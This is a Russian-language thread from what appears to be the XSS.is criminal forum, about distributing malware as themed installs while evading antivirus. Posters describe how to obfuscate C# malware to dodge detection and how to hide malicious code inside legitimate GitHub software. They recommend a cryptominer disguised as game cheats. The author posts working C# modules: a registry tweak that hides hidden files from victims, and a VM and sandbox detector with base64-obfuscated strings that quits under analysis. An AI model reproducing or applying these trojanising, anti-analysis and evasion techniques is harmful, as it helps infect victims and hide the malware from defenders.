а ну да) но если по примеру следовать, у него в коде прописано по кнопке clsButtonGreen1_Click . так что тебе нужна это кнопка
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Статья Получаем тематические загрузки вашего exe без слива на ВТ вашей малвари
- Автор темы ViCode
- Дата начала
по детектам смотрите.
статью ведь аверы тоже читают )), поэтому.
берете делаете новый проект. в другой директории даже.
название проекта рандомно.
именна классов, неймспейсов, функций, переменных, меняете.
если чтото можно переставить в коде, тоже меняете.
добавьте функциональный код, белый, сортировку какуюнибудь.
вот и весь детект на шарпе.
чтобы это автоматизировать, нужно написать билдер, чтобы это делал автоматом, можно даже ИИ подключить, и попарсить гитхаб тотже.
и да. 19я студия сливает что нужно себе., делаейтся оффлайн проекты.
статью ведь аверы тоже читают )), поэтому.
берете делаете новый проект. в другой директории даже.
название проекта рандомно.
именна классов, неймспейсов, функций, переменных, меняете.
если чтото можно переставить в коде, тоже меняете.
добавьте функциональный код, белый, сортировку какуюнибудь.
вот и весь детект на шарпе.
чтобы это автоматизировать, нужно написать билдер, чтобы это делал автоматом, можно даже ИИ подключить, и попарсить гитхаб тотже.
и да. 19я студия сливает что нужно себе., делаейтся оффлайн проекты.
- Автор темы
- Добавить закладку
- #123
Все так, еще добавлю что можно с гитхаба брать реально рабочий софт на c# туда пихать свой код с вирем по этой теме компилить и пропихивать. Так еще меньше детектов и палева.
Да и не только из гитхаба. Как я раньше писал - исходников в сети масса. Главное определится с направлением распространения. То есть - игровуха - соответственно читы и тд. Форекс - анализаторы, советники и тд. Вебмастера - это вообще поле непаханное, софта там востребовано куча
- Автор темы
- Добавить закладку
- #125
збс ниша конечно майнер под видом читов. прогрузов море а доход так себе я скажу. Но инсталлов за то шик. Так что если надо схему проверить читы + майнер самое то.
- Автор темы
- Добавить закладку
- #126
мм? о_0 куда?
- Автор темы
- Добавить закладку
- #127
Допка .
В мейн подрубаем так: Atrub();
static void Atrub()
{
//////////////////////Вырубить показ скрытых файлов в Windows///////////////////////
RegistryKey rkey = Registry.CurrentUser;
rkey = rkey.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced");
rkey.SetValue("Hidden", 0);
}
Уже "Модули под тему поперли" а точнее заметки для себя делаю ;D мб пригодится кому.
Как подключить не буду объяснять:
VMdetect.cs
Что такое то же думайте уже сами. Да там шифрование строк в base64 из момей соседней статьи, те кто следит за моими темами смогут разобраться.
Детект простой, но нулевой детект. Некоторый код заимствован. т.е данный код детекта вм не весь мой.
В мейн подрубаем так: Atrub();
У вас должно быть более 1 реакций для просмотра скрытого контента.
static void Atrub()
{
//////////////////////Вырубить показ скрытых файлов в Windows///////////////////////
RegistryKey rkey = Registry.CurrentUser;
rkey = rkey.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced");
rkey.SetValue("Hidden", 0);
}
Уже "Модули под тему поперли" а точнее заметки для себя делаю ;D мб пригодится кому.
Как подключить не буду объяснять:
VMdetect.cs
Что такое то же думайте уже сами. Да там шифрование строк в base64 из момей соседней статьи, те кто следит за моими темами смогут разобраться.
C#:
using System;
using System.Linq;
using System.Management;
using System.Runtime.InteropServices;
using System.Text;
namespace ViSt
{
class VMdetect
{
public static void Runvmdetect()
{
if (DetectVirtualMachine())
Quit();
}
[DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string running);
public static string CreateASCIIStr(string value) =>
Encoding.ASCII.GetString(Convert.FromBase64String(value));
public static bool DetectVirtualMachine()
{
using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
{
using (var items = searcher.Get())
{
foreach (var item in items)
{
string manufacturer = item["Manufacturer"].ToString().ToLower();
if ((manufacturer == "microsoft corporation" && item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL"))
|| manufacturer.Contains(CreateASCIIStr("dm13YXJl"))
|| item["Model"].ToString() == CreateASCIIStr("VmlydHVhbEJveA==") || GetModuleHandle("cmdvrt32.dll").ToInt32() != 0 || GetModuleHandle("SxIn.dll").ToInt32() != 0
|| GetModuleHandle("SbieDll.dll").ToInt32() != 0 || GetModuleHandle("Sf2.dll").ToInt32() != 0 ||
GetModuleHandle("snxhk.dll").ToInt32() != 0)
{
return true;
}
var hypervisorPresentProperty
= item.Properties
.OfType<PropertyData>()
.FirstOrDefault(p => p.Name == "HypervisorPresent");
if ((bool?)hypervisorPresentProperty?.Value == true)
{
return true;
}
}
}
}
return false;
}
public static void Quit()
{
Environment.Exit(0);
}
}
}
Последнее редактирование:
хз куда. в мелкософт видимо.
мне вообще продукты последнии настрораживают.
да качественные и тд. НО
качал я как то Visual Studio Code, кросплатформенный который.
так я замучился отрубать там телеметрию, непонятные апдйты, потоянно лезет в нет и паказывает окна, своей жизьнью живет.
а мне всего лишь нужен был редактор норм.
никчему не призываю, т.к. доказательной базы нет.
мое ИХМО
- Автор темы
- Добавить закладку
- #129
Да это всегда и везде, уже можно хер забивать. Я сколько не блочу трафик в своей винде все равно какая то шляпа стучит на мелко софт. Уже наверное более 1000 хостов лично в баню внес. Все равно стучит.
Хорошая статья ! Продолжай в том же духе респект было приятно почитать.
Зачем ты создаёшь этот ключ реестра? Такой ключ уже существует, OpenSubKey, нет?
- Автор темы
- Добавить закладку
- #132
Потому что иначе палит Eset.
А тебя не смущает то, что в любом случае ключ откроется, а не создастся? И вызван будет тот-же OpenSubKey.
- Автор темы
- Добавить закладку
- #134
Вообще не смущает потому что это одно и тоже но Eset видит это иначе, на что закрывает глаза если ключ переопределить самому.
Бред какой-то. Это невозможно чисто по логике, действие происходит одно и то же. А если ты про скантайм - то земля пухом.
- Автор темы
- Добавить закладку
- #136
Действие одно код другой, да я про скантайм. все по полкам что бы не было проблем. или ты думаешь что контингент статьи будет как то криптовать или прятать код? Если ты шаришь тебе же лучше. Сделай так как считаешь нужным.
Суть статьи вообще в другом, а допы, это халява если требуется. Верти как хочешь по своему усмотрению.
Тогда наворачивается вопрос. Зачем говнокодить, если всё равно без крипта подобное лить никто не будет никуда?
- Автор темы
- Добавить закладку
- #138
На твой вопрос пусть ответят те кто прочитал статью целиком и полностью, включая посты выше которые ты видимо не увидел и делают то что описано в ней. Я же умываю руки раз не дошло до тебя.
Последнее редактирование:
На конец получилось собрать exe шник.
Кроме ТС хочу сказать спасибо kaha и doggi за то, что нашли способ запихнуть в меня информацию.
Без вас бы не получилось !
Кроме ТС хочу сказать спасибо kaha и doggi за то, что нашли способ запихнуть в меня информацию.
Без вас бы не получилось !
Пол форума ждали, когда твоя программа скомпилируется) и у нас получилось